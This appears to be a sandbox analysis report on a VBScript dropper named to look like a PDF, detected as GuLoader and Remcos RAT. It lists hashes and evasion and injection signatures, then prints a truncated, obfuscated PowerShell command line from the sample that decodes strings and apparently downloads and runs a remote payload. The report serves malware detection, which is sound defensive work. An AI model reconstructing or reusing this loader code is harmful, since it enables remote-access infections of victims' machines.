Edit tour
Windows
Analysis Report
18000012550_20240930_0078864246#U00b7pdf.vbs
Overview
General Information
Sample name: | 18000012550_20240930_0078864246#U00b7pdf.vbsrenamed because original name is a hash value |
Original sample name: | 18000012550_20240930_0078864246pdf.vbs |
Analysis ID: | 1523161 |
MD5: | 89985981616f5fdef265814322d9735d |
SHA1: | a7a505cea8373907fec133bf34d8d38e86e4dfb2 |
SHA256: | 701bac7c15873d9eadaf8a70ca969adb5d3036421f1872cc706adafc51f7f751 |
Tags: | vbsuser-abuse_ch |
Infos: | |
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7676 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\18000 012550_202 40930_0078 864246#U00 b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7796 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Akaniac eae Herefo rds Skifer tavles #>; $Tennisalb ue='Landgr nse';<#tal lerkenret Gravkers B andonion # >;$Unvicar ious156=$h ost.Privat eData;If ( $Unvicario us156) {$S anitetsart ikel++;}fu nction Run dholts($Af fectationi st){$Blasf emiernes=$ Hittebarne ts+$Affect ationist.L ength-$San itetsartik el;for( $F astendes=5 ;$Fastende s -lt $Bla sfemiernes ;$Fastende s+=6){$Com posersatse rne+=$Affe ctationist [$Fastende s];}$Compo sersatsern e;}functio n Katedres ($threadli ke){ . ($ Absoluthed ) ($thread like);}$Ox yhemocyani n=Rundholt s 'Pa opMR ach oBarne z ormi Con lPtolel S yntaCompo/ Nonse5 Rhe o.Netw 0 O psi Tvanm( ,lyveWUnem bib,eotn P asadPostco Ou,dew Una rs Dagb Mu ssoNDvaleT Nymp. Spro s1Alp n0A ton.Ji ga0 Runds; Mye l LandiWMa lniiL thon Unmud6Pr,s e4 Spek;Ti lba Udloex Syste6 ann e4Ignor; U nig RejmrG oalpv awki : arto1Maa le2dogto1P upil.Outbl 0Sem h)Sl, ms Shr wGB redleNdhav cd uidk ru nco,aser/P .wer2Cenes 0Milje1Tal le0Sikke0 Dybt1Over 0 brun1Mi ia nonreFS erviiTombo rUf gleuds myfTormeo BathxSamle /Gdann1Til l 2Blemi1S tipe.Bookn 0Sgete ';$ Paahngsmot ors=Rundho lts 'Ci.ar uTrv eSR.c ereApostr. amme-Evalu aVoka g Tu rgEPerboNR edisTPhyto ';$Sympat isrers=Run dholts 'Ab oithUdp,nt SmaratXant hpfuldbsG dro:P aco/ sc ot/Besi nd uachrHv idei Opulv No pheAfla s.Hy,ergIn foro Hurko StoregLabi ll bilre s lv.Pteroc RytmoPidd lm Bi l/Sp orvu Anacc Indre?Data oeSti fxma terp Yde o OpgavrFals ktSwap = l yndPlasho SupewR.pet nGrofelTj lko EcodaS kriddAmuei &.orsgiK s sedR sso= Inde1Inse 6u,stoKSub brU Ha,pqS .rimagloos QRegel_Gen neXsuper6L odgiz S,ur b ysfuB Im puHMu,tiAC onteGV nst N I manKre dis Stude Da.awurdyp u B les.il atwForedUB awdsAVerba ZHjttax Kl oat Pr.cxS olodG Ball v Fags7 Pa pn ';$afri mninger=Ru ndholts ' dies> Iamb ';$Absolu thed=Rundh olts 'Inda diRekruEDi ssex Gyro ';$Fastend esnconsult able='Misa ppropriati ng';$Newfa ngle='\For svarsminis ters.Sca'; Katedres ( Rundholts 'Rbest$Tie nngLetmelK onomo ubcu bTrommaSlu gglGaade:O vermMJewbi iEarlilSdm eflTr,ppiG rilloLodre n fmateBys terPrivi=T oupe$ Asse eRotatnTru stvHelv :F asefaHoa.c p .apip di urdStaala. alketDieth a Manu+Dat ak$H terNO utbleUd,pa w dis.f Sc amast genR ep.igLse.a l Crabe Pr el ');Kate dres (Rund holts 'Grn se$Sinu gS .blel.esta oSamarbRef uea Min lS ema.:Va.so PStro aSka lklTechnaS krabvAtomv eRigsgrGal .eeRema,sB i al=Hornb $IriziSTes tiyReim,mU nm sp oddv ave,rttSoc iaiUnsubs Indlr Udbr eErfarrFol kesAlter.S hrins Ag.r pBild,lBru gsi Fllet Gge (Hjemk $ SperaPus lifInt rr SprgiEn.an mHusbenFat heiRicarnS kandg shar eSt,icrOve rr)Di mi ' );Katedres (Rundholt s 'Kn wf[F orthN Syge